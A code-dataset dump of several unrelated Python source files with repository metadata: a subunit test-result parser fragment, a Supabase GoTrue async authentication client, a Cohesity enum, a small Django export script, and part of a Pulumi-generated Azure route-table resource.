self._tests[test_id]["duration"] = "%.3f" % (
timestamp - self._timestamps[test_id]).total_seconds()
self._tests[test_id]["status"] = test_status
self._check_expected_failure(test_id)
else:
if file_name in ["traceback", "reason"]:
if file_name not in self._tests[test_id]:
self._tests[test_id][file_name] = file_bytes
else:
self._tests[test_id][file_name] += file_bytes
else:
self._unknown_entities.setdefault(test_id, {"name": test_id})
self._unknown_entities[test_id]["status"] = test_status
if file_name in ["traceback", "reason"]:
if file_name not in self._unknown_entities[test_id]:
self._unknown_entities[test_id][file_name] = file_bytes
else:
self._unknown_entities[test_id][file_name] += file_bytes
if self._skipped_tests:
self._process_skipped_tests()
if self._live and test_status not in (None, "exists", "inprogress"):
duration = ""
if test_id in self._tests:
status = self._tests[test_id]["status"]
duration = " [%ss]" % self._tests[test_id]["duration"]
else:
status = test_status
status += duration
if "xfail" in status or "skip" in status:
if test_id in self._tests:
reason = self._tests[test_id].get("reason")
else:
reason = self._unknown_entities[test_id].get("reason")
if reason:
status += ": %s" % reason
w = "{%s} " % worker.pop().split("-")[1] if worker else "-"
self._logger.info("%s ... %s"
% (w + self._get_test_name(test_id), status))
def filter_tests(self, status):
"""Filter tests by given status."""
filtered_tests = {}
for test in self.tests:
if self.tests[test]["status"] == status:
filtered_tests[test] = self.tests[test]
return filtered_tests
def parse(stream, expected_failures=None, skipped_tests=None, live=False,
logger_name=None):
results = SubunitV2StreamResult(expected_failures, skipped_tests, live,
logger_name)
v2.ByteStreamToStreamResult(stream, "non-subunit").run(results)
return results
def parse_file(filename, expected_failures=None, skipped_tests=None,
live=False, logger_name=None):
with open(filename, "rb") as stream:
return parse(stream, expected_failures, skipped_tests, live,
logger_name)
| 39.356 | 79 | 0.565403 |
4a1b6c5f6abe2dea8b3a02740445a4d7002aa124
| 22,400 |
py
|
Python
|
venv/Lib/site-packages/gotrue/_async/client.py
|
KevinArellano94/Python-Supabase
|
98d2497419cd796e95555935239d1178e250f3ab
|
[
"MIT"
] | 13 |
2021-10-06T08:50:55.000Z
|
2022-03-29T18:21:12.000Z
|
venv/Lib/site-packages/gotrue/_async/client.py
|
KevinArellano94/Python-Supabase
|
98d2497419cd796e95555935239d1178e250f3ab
|
[
"MIT"
] | 82 |
2021-09-29T11:50:29.000Z
|
2022-03-24T07:27:33.000Z
|
venv/Lib/site-packages/gotrue/_async/client.py
|
KevinArellano94/Python-Supabase
|
98d2497419cd796e95555935239d1178e250f3ab
|
[
"MIT"
] | 4 |
2021-09-15T07:33:22.000Z
|
2022-01-13T22:53:01.000Z
|
from __future__ import annotations
from functools import partial
from json import dumps, loads
from threading import Timer
from time import time
from typing import Any, Callable, Dict, Optional, Tuple, Union, cast
from urllib.parse import parse_qs, urlparse
from uuid import uuid4
from ..constants import COOKIE_OPTIONS, DEFAULT_HEADERS, GOTRUE_URL, STORAGE_KEY
from ..exceptions import APIError
from ..types import (
AuthChangeEvent,
CookieOptions,
Provider,
Session,
Subscription,
User,
UserAttributes,
)
from .api import AsyncGoTrueAPI
from .storage import AsyncMemoryStorage, AsyncSupportedStorage
class AsyncGoTrueClient:
def __init__(
self,
*,
url: str = GOTRUE_URL,
headers: Dict[str, str] = {},
auto_refresh_token: bool = True,
persist_session: bool = True,
local_storage: AsyncSupportedStorage = AsyncMemoryStorage(),
cookie_options: CookieOptions = CookieOptions.parse_obj(COOKIE_OPTIONS),
api: Optional[AsyncGoTrueAPI] = None,
replace_default_headers: bool = False,
) -> None:
"""Create a new client
url : str
The URL of the GoTrue server.
headers : Dict[str, str]
Any additional headers to send to the GoTrue server.
auto_refresh_token : bool
Set to "true" if you want to automatically refresh the token before
expiring.
persist_session : bool
Set to "true" if you want to automatically save the user session
into local storage.
local_storage : SupportedStorage
The storage engine to use for persisting the session.
cookie_options : CookieOptions
The options for the cookie.
"""
if url.startswith("http://"):
print(
"Warning:\n\nDO NOT USE HTTP IN PRODUCTION FOR GOTRUE EVER!\n"
"GoTrue REQUIRES HTTPS to work securely."
)
self.state_change_emitters: Dict[str, Subscription] = {}
self.refresh_token_timer: Optional[Timer] = None
self.current_user: Optional[User] = None
self.current_session: Optional[Session] = None
self.auto_refresh_token = auto_refresh_token
self.persist_session = persist_session
self.local_storage = local_storage
empty_or_default_headers = {} if replace_default_headers else DEFAULT_HEADERS
args = {
"url": url,
"headers": {**empty_or_default_headers, **headers},
"cookie_options": cookie_options,
}
self.api = api or AsyncGoTrueAPI(**args)
async def __aenter__(self) -> AsyncGoTrueClient:
return self
async def __aexit__(self, exc_t, exc_v, exc_tb) -> None:
await self.close()
async def close(self) -> None:
await self.api.close()
async def init_recover(self) -> None:
"""Recover the current session from local storage."""
await self._recover_session()
await self._recover_and_refresh()
async def sign_up(
self,
*,
email: Optional[str] = None,
phone: Optional[str] = None,
password: Optional[str] = None,
redirect_to: Optional[str] = None,
data: Optional[Dict[str, Any]] = None,
) -> Union[Session, User]:
"""Creates a new user. If email and phone are provided, email will be
used and phone will be ignored.
Parameters
---------
email : Optional[str]
The user's email address.
phone : Optional[str]
The user's phone number.
password : Optional[str]
The user's password.
redirect_to : Optional[str]
A URL or mobile address to send the user to after they are confirmed.
data : Optional[Dict[str, Any]]
Optional user metadata.
Returns
-------
response : Union[Session, User]
A logged-in session if the server has "autoconfirm" ON
A user if the server has "autoconfirm" OFF
Raises
------
error : APIError
If an error occurs
"""
await self._remove_session()
if email and password:
response = await self.api.sign_up_with_email(
email=email,
password=password,
redirect_to=redirect_to,
data=data,
)
elif phone and password:
response = await self.api.sign_up_with_phone(
phone=phone, password=password, data=data
)
elif not password:
raise ValueError("Password must be defined, can't be None.")
else:
raise ValueError("Email or phone must be defined, both can't be None.")
if isinstance(response, Session):
# The user has confirmed their email or the underlying DB doesn't
# require email confirmation.
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def sign_in(
self,
*,
email: Optional[str] = None,
phone: Optional[str] = None,
password: Optional[str] = None,
refresh_token: Optional[str] = None,
provider: Optional[Provider] = None,
redirect_to: Optional[str] = None,
scopes: Optional[str] = None,
create_user: bool = False,
) -> Optional[Union[Session, str]]:
"""Log in an existing user, or login via a third-party provider.
If email and phone are provided, email will be used and phone will be ignored.
Parameters
---------
email : Optional[str]
The user's email address.
phone : Optional[str]
The user's phone number.
password : Optional[str]
The user's password.
refresh_token : Optional[str]
A valid refresh token that was returned on login.
provider : Optional[Provider]
One of the providers supported by GoTrue.
redirect_to : Optional[str]
A URL or mobile address to send the user to after they are confirmed.
scopes : Optional[str]
A space-separated list of scopes granted to the OAuth application.
Returns
-------
response : Optional[Union[Session, str]]
If only email are provided between the email and password,
None is returned and send magic link to email
If email and password are provided, a logged-in session is returned.
If only phone are provided between the phone and password,
None is returned and send message to phone
If phone and password are provided, a logged-in session is returned.
If refresh_token is provided, a logged-in session is returned.
If provider is provided, an redirect URL is returned.
Otherwise, error is raised.
Raises
------
error : APIError
If an error occurs
"""
await self._remove_session()
if email:
if password:
response = await self._handle_email_sign_in(
email=email,
password=password,
redirect_to=redirect_to,
)
else:
response = await self.api.send_magic_link_email(
email=email, create_user=create_user
)
elif phone:
if password:
response = await self._handle_phone_sign_in(
phone=phone, password=password
)
else:
response = await self.api.send_mobile_otp(
phone=phone, create_user=create_user
)
elif refresh_token:
# current_session and current_user will be updated to latest
# on _call_refresh_token using the passed refresh_token
await self._call_refresh_token(refresh_token=refresh_token)
response = self.current_session
elif provider:
response = await self._handle_provider_sign_in(
provider=provider,
redirect_to=redirect_to,
scopes=scopes,
)
else:
raise ValueError(
"Email, phone, refresh_token, or provider must be defined, "
"all can't be None."
)
return response
async def verify_otp(
self,
*,
phone: str,
token: str,
redirect_to: Optional[str] = None,
) -> Union[Session, User]:
"""Log in a user given a User supplied OTP received via mobile.
Parameters
----------
phone : str
The user's phone number.
token : str
The user's OTP.
redirect_to : Optional[str]
A URL or mobile address to send the user to after they are confirmed.
Returns
-------
response : Union[Session, User]
A logged-in session if the server has "autoconfirm" ON
A user if the server has "autoconfirm" OFF
Raises
------
error : APIError
If an error occurs
"""
await self._remove_session()
response = await self.api.verify_mobile_otp(
phone=phone,
token=token,
redirect_to=redirect_to,
)
if isinstance(response, Session):
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
def user(self) -> Optional[User]:
"""Returns the user data, if there is a logged in user."""
return self.current_user
def session(self) -> Optional[Session]:
"""Returns the session data, if there is an active session."""
return self.current_session
async def refresh_session(self) -> Session:
"""Force refreshes the session.
Force refreshes the session including the user data incase it was
updated in a different session.
"""
if not self.current_session:
raise ValueError("Not logged in.")
return await self._call_refresh_token()
async def update(self, *, attributes: UserAttributes) -> User:
"""Updates user data, if there is a logged in user.
Parameters
----------
attributes : UserAttributes
The attributes to update.
Returns
-------
response : User
The updated user data.
Raises
------
error : APIError
If an error occurs
"""
if not self.current_session:
raise ValueError("Not logged in.")
response = await self.api.update_user(
jwt=self.current_session.access_token,
attributes=attributes,
)
self.current_session.user = response
await self._save_session(session=self.current_session)
self._notify_all_subscribers(event=AuthChangeEvent.USER_UPDATED)
return response
async def set_session(self, *, refresh_token: str) -> Session:
"""Sets the session data from refresh_token and returns current Session
Parameters
----------
refresh_token : str
A JWT token
Returns
-------
response : Session
A logged-in session
Raises
------
error : APIError
If an error occurs
"""
response = await self.api.refresh_access_token(refresh_token=refresh_token)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def set_auth(self, *, access_token: str) -> Session:
"""Overrides the JWT on the current client. The JWT will then be sent in
all subsequent network requests.
Parameters
----------
access_token : str
A JWT token
Returns
-------
response : Session
A logged-in session
Raises
------
error : APIError
If an error occurs
"""
session = Session(
access_token=access_token,
token_type="bearer",
user=None,
expires_in=None,
expires_at=None,
refresh_token=None,
provider_token=None,
)
if self.current_session:
session.expires_in = self.current_session.expires_in
session.expires_at = self.current_session.expires_at
session.refresh_token = self.current_session.refresh_token
session.provider_token = self.current_session.provider_token
await self._save_session(session=session)
return session
async def get_session_from_url(
self,
*,
url: str,
store_session: bool = False,
) -> Session:
"""Gets the session data from a URL string.
Parameters
----------
url : str
The URL string.
store_session : bool
Optionally store the session in the browser
Returns
-------
response : Session
A logged-in session
Raises
------
error : APIError
If an error occurs
"""
data = urlparse(url)
query = parse_qs(data.query)
error_description = query.get("error_description")
access_token = query.get("access_token")
expires_in = query.get("expires_in")
refresh_token = query.get("refresh_token")
token_type = query.get("token_type")
if error_description:
raise APIError(error_description[0], 400)
if not access_token or not access_token[0]:
raise APIError("No access_token detected.", 400)
if not refresh_token or not refresh_token[0]:
raise APIError("No refresh_token detected.", 400)
if not token_type or not token_type[0]:
raise APIError("No token_type detected.", 400)
if not expires_in or not expires_in[0]:
raise APIError("No expires_in detected.", 400)
try:
expires_at = round(time()) + int(expires_in[0])
except ValueError:
raise APIError("Invalid expires_in.", 400)
response = await self.api.get_user(jwt=access_token[0])
provider_token = query.get("provider_token")
session = Session(
access_token=access_token[0],
token_type=token_type[0],
user=response,
expires_in=int(expires_in[0]),
expires_at=expires_at,
refresh_token=refresh_token[0],
provider_token=provider_token[0] if provider_token else None,
)
if store_session:
await self._save_session(session=session)
recovery_mode = query.get("type")
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
if recovery_mode and recovery_mode[0] == "recovery":
self._notify_all_subscribers(event=AuthChangeEvent.PASSWORD_RECOVERY)
return session
async def sign_out(self) -> None:
"""Log the user out."""
access_token: Optional[str] = None
if self.current_session:
access_token = self.current_session.access_token
await self._remove_session()
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_OUT)
if access_token:
await self.api.sign_out(jwt=access_token)
def _unsubscribe(self, *, id: str) -> None:
"""Unsubscribe from a subscription."""
self.state_change_emitters.pop(id)
def on_auth_state_change(
self,
*,
callback: Callable[[AuthChangeEvent, Optional[Session]], None],
) -> Subscription:
"""Receive a notification every time an auth event happens.
Parameters
----------
callback : Callable[[AuthChangeEvent, Optional[Session]], None]
The callback to call when an auth event happens.
Returns
-------
subscription : Subscription
A subscription object which can be used to unsubscribe itself.
Raises
------
error : APIError
If an error occurs
"""
unique_id = uuid4()
subscription = Subscription(
id=unique_id,
callback=callback,
unsubscribe=partial(self._unsubscribe, id=unique_id.hex),
)
self.state_change_emitters[unique_id.hex] = subscription
return subscription
async def _handle_email_sign_in(
self,
*,
email: str,
password: str,
redirect_to: Optional[str],
) -> Session:
"""Sign in with email and password."""
response = await self.api.sign_in_with_email(
email=email,
password=password,
redirect_to=redirect_to,
)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def _handle_phone_sign_in(self, *, phone: str, password: str) -> Session:
"""Sign in with phone and password."""
response = await self.api.sign_in_with_phone(phone=phone, password=password)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def _handle_provider_sign_in(
self,
*,
provider: Provider,
redirect_to: Optional[str],
scopes: Optional[str],
) -> str:
"""Sign in with provider."""
return await self.api.get_url_for_provider(
provider=provider,
redirect_to=redirect_to,
scopes=scopes,
)
async def _recover_common(self) -> Optional[Tuple[Session, int, int]]:
"""Recover common logic"""
json = await self.local_storage.get_item(STORAGE_KEY)
if not json:
return
data = loads(json)
session_raw = data.get("session")
expires_at_raw = data.get("expires_at")
if (
expires_at_raw
and isinstance(expires_at_raw, int)
and session_raw
and isinstance(session_raw, dict)
):
session = Session.parse_obj(session_raw)
expires_at = int(expires_at_raw)
time_now = round(time())
return session, expires_at, time_now
async def _recover_session(self) -> None:
"""Attempts to get the session from LocalStorage"""
result = await self._recover_common()
if not result:
return
session, expires_at, time_now = result
if expires_at >= time_now:
await self._save_session(session=session)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
async def _recover_and_refresh(self) -> None:
"""Recovers the session from LocalStorage and refreshes"""
result = await self._recover_common()
if not result:
return
session, expires_at, time_now = result
if expires_at < time_now and self.auto_refresh_token and session.refresh_token:
try:
await self._call_refresh_token(refresh_token=session.refresh_token)
except APIError:
await self._remove_session()
elif expires_at < time_now or not session or not session.user:
await self._remove_session()
else:
await self._save_session(session=session)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
async def _call_refresh_token(
self, *, refresh_token: Optional[str] = None
) -> Session:
if refresh_token is None:
if self.current_session:
refresh_token = self.current_session.refresh_token
else:
raise ValueError("No current session and refresh_token not supplied.")
response = await self.api.refresh_access_token(
refresh_token=cast(str, refresh_token)
)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.TOKEN_REFRESHED)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
def _notify_all_subscribers(self, *, event: AuthChangeEvent) -> None:
"""Notify all subscribers that auth event happened."""
for value in self.state_change_emitters.values():
value.callback(event, self.current_session)
async def _save_session(self, *, session: Session) -> None:
"""Save session to client."""
self.current_session = session
self.current_user = session.user
if session.expires_at:
time_now = round(time())
expire_in = session.expires_at - time_now
refresh_duration_before_expires = 60 if expire_in > 60 else 0.5
self._start_auto_refresh_token(
value=(expire_in - refresh_duration_before_expires) * 1000
)
if self.persist_session and session.expires_at:
await self._persist_session(session=session)
async def _persist_session(self, *, session: Session) -> None:
data = {"session": session.dict(), "expires_at": session.expires_at}
await self.local_storage.set_item(STORAGE_KEY, dumps(data, default=str))
async def _remove_session(self) -> None:
"""Remove the session."""
self.current_session = None
self.current_user = None
if self.refresh_token_timer:
self.refresh_token_timer.cancel()
await self.local_storage.remove_item(STORAGE_KEY)
def _start_auto_refresh_token(self, *, value: float) -> None:
if self.refresh_token_timer:
self.refresh_token_timer.cancel()
if value <= 0 or not self.auto_refresh_token:
return
self.refresh_token_timer = Timer(value, self._call_refresh_token)
self.refresh_token_timer.start()
| 35 | 87 | 0.599598 |
4a1b6c748898149806d49f213bd08b5464c96407
| 146 |
py
|
Python
|
.history/AdvanceP/error_20200514081055.py
|
EvanthiosPapadopoulos/Python3
|
ab773fd458e365c1510f98ecac65965234c881e8
|
[
"MIT"
] | 1 |
2020-05-18T17:50:00.000Z
|
2020-05-18T17:50:00.000Z
|
Udemy/Complete_Python_Bootcamp/AdvanceP/error.py
|
EvanthiosPapadopoulos/Python3
|
ab773fd458e365c1510f98ecac65965234c881e8
|
[
"MIT"
] | null | null | null |
Udemy/Complete_Python_Bootcamp/AdvanceP/error.py
|
EvanthiosPapadopoulos/Python3
|
ab773fd458e365c1510f98ecac65965234c881e8
|
[
"MIT"
] | null | null | null |
'''
A very simple script
'''
def myfunc():
'''
simple
'''
first = 1
second = 2
print(first)
print(second)
myfunc()
| 9.125 | 20 | 0.493151 |
4a1b6d2b097bdda71e26cec231abed69fd5b61d7
| 1,415 |
py
|
Python
|
cohesity_management_sdk/models/status_dag_application_server_info_enum.py
|
nick6655/management-sdk-python
|
88e792cb83e5c24a22af495b220c145d0c45841d
|
[
"Apache-2.0"
] | 18 |
2019-09-24T17:35:53.000Z
|
2022-03-25T08:08:47.000Z
|
cohesity_management_sdk/models/status_dag_application_server_info_enum.py
|
nick6655/management-sdk-python
|
88e792cb83e5c24a22af495b220c145d0c45841d
|
[
"Apache-2.0"
] | 18 |
2019-03-29T19:32:29.000Z
|
2022-01-03T23:16:45.000Z
|
cohesity_management_sdk/models/status_dag_application_server_info_enum.py
|
nick6655/management-sdk-python
|
88e792cb83e5c24a22af495b220c145d0c45841d
|
[
"Apache-2.0"
] | 16 |
2019-02-27T06:54:12.000Z
|
2021-11-16T18:10:24.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
class StatusDagApplicationServerInfoEnum(object):
"""Implementation of the 'Status_DagApplicationServerInfo' enum.
Specifies the status of the registration of the Exchange Application
Server.
Specifies the status of registration of Exchange Application Server.
'kUnknown' indicates the status is not known.
'kHealthy' indicates the status is healty and is registered as
Exchange Server.
'kUnHealthy' indicates the exchange application is registered on the
physical server but it is unreachable now.
'kUnregistered' indicates the server is not registered as physical source.
'kUnreachable' indicates the server is not reachable from the cohesity
cluster or the cohesity protection server is not installed on the exchange
server.
'kDetached' indicates the server is removed from the ExchangeDAG.
Attributes:
KUNKNOWN: TODO: type description here.
KHEALTHY: TODO: type description here.
KUNHEALTHY: TODO: type description here.
KUNREGISTERED: TODO: type description here.
KUNREACHABLE: TODO: type description here.
KDETACHED: TODO: type description here.
"""
KUNKNOWN = 'kUnknown'
KHEALTHY = 'kHealthy'
KUNHEALTHY = 'kUnHealthy'
KUNREGISTERED = 'kUnregistered'
KUNREACHABLE = 'kUnreachable'
KDETACHED = 'kDetached'
| 32.159091 | 78 | 0.722968 |
4a1b6dc2125076b4a876ebbf12e8de51ab7a786c
| 430 |
py
|
Python
|
djspace/bin/export.py
|
carthagecollege/django-djspace
|
0fd26cccecdfd644255b323664e69b856ec90838
|
[
"MIT"
] | null | null | null |
djspace/bin/export.py
|
carthagecollege/django-djspace
|
0fd26cccecdfd644255b323664e69b856ec90838
|
[
"MIT"
] | 10 |
2020-10-06T15:39:29.000Z
|
2022-02-19T15:07:12.000Z
|
djspace/bin/export.py
|
carthagecollege/django-djspace
|
0fd26cccecdfd644255b323664e69b856ec90838
|
[
"MIT"
] | null | null | null |
import django
django.setup()
from django.contrib.auth.models import User
users = User.objects.all().order_by("last_name")
for user in users:
try:
apps = user.profile.applications.all()
except:
apps = None
if apps:
for a in apps:
#if str(a) == "First Nations Rocket Competition":
if a.get_slug() == "first-nations-rocket-competition":
print a.__dict__
| 23.888889 | 66 | 0.609302 |
4a1b6e4921b56db8912fdc771a559b63e29f6772
| 14,147 |
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200601/virtual_hub_route_table_v2.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200601/virtual_hub_route_table_v2.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200601/virtual_hub_route_table_v2.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['VirtualHubRouteTableV2Args', 'VirtualHubRouteTableV2']
@pulumi.input_type
class VirtualHubRouteTableV2Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
virtual_hub_name: pulumi.Input[str],
attached_connections: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
route_table_name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]]] = None):
"""
The set of arguments for constructing a VirtualHubRouteTableV2 resource.
:param pulumi.Input[str] resource_group_name: The resource group name of the VirtualHub.
:param pulumi.Input[str] virtual_hub_name: The name of the VirtualHub.
:param pulumi.Input[Sequence[pulumi.Input[str]]] attached_connections: List of all connections attached to this route table v2.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] route_table_name: The name of the VirtualHubRouteTableV2.
:param pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]] routes: List of all routes.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "virtual_hub_name", virtual_hub_name)
if attached_connections is not None:
pulumi.set(__self__, "attached_connections", attached_connections)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if route_table_name is not None:
pulumi.set(__self__, "route_table_name", route_table_name)
if routes is not None:
pulumi.set(__self__, "routes", routes)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name of the VirtualHub.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="virtualHubName")
def virtual_hub_name(self) -> pulumi.Input[str]:
"""
The name of the VirtualHub.
"""
return pulumi.get(self, "virtual_hub_name")
@virtual_hub_name.setter
def virtual_hub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "virtual_hub_name", value)
@property
@pulumi.getter(name="attachedConnections")
def attached_connections(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of all connections attached to this route table v2.
"""
return pulumi.get(self, "attached_connections")
@attached_connections.setter
def attached_connections(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "attached_connections", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="routeTableName")
def route_table_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the VirtualHubRouteTableV2.
"""
return pulumi.get(self, "route_table_name")
@route_table_name.setter
def route_table_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "route_table_name", value)
@property
@pulumi.getter
def routes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]]]:
"""
List of all routes.
"""
return pulumi.get(self, "routes")
@routes.setter
def routes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]]]):
pulumi.set(self, "routes", value)
class VirtualHubRouteTableV2(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attached_connections: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
route_table_name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualHubRouteV2Args']]]]] = None,
virtual_hub_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
VirtualHubRouteTableV2 Resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] attached_connections: List of all connections attached to this route table v2.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] resource_group_name: The resource group name of the VirtualHub.
:param pulumi.Input[str] route_table_name: The name of the VirtualHubRouteTableV2.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualHubRouteV2Args']]]] routes: List of all routes.
:param pulumi.Input[str] virtual_hub_name: The name of the VirtualHub.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualHubRouteTableV2Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
VirtualHubRouteTableV2 Resource.
:param str resource_name: The name of the resource.
:param VirtualHubRouteTableV2Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualHubRouteTableV2Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attached_connections: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
route_table_name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualHubRouteV2Args']]]]] = None,
virtual_hub_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualHubRouteTableV2Args.__new__(VirtualHubRouteTableV2Args)
__props__.__dict__["attached_connections"] = attached_connections
__props__.__dict__["id"] = id
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["route_table_name"] = route_table_name
__props__.__dict__["routes"] = routes
if virtual_hub_name is None and not opts.urn:
raise TypeError("Missing required property 'virtual_hub_name'")
__props__.__dict__["virtual_hub_name"] = virtual_hub_name
__props__.__dict__["etag"] = None
__props__.__dict__["provisioning_state"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20190901:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200301:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200501:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200501:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20201101:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20201101:VirtualHubRouteTableV2")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualHubRouteTableV2, __self__).__init__(
'azure-native:network/v20200601:VirtualHubRouteTableV2',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualHubRouteTableV2':
"""
Get an existing VirtualHubRouteTableV2 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
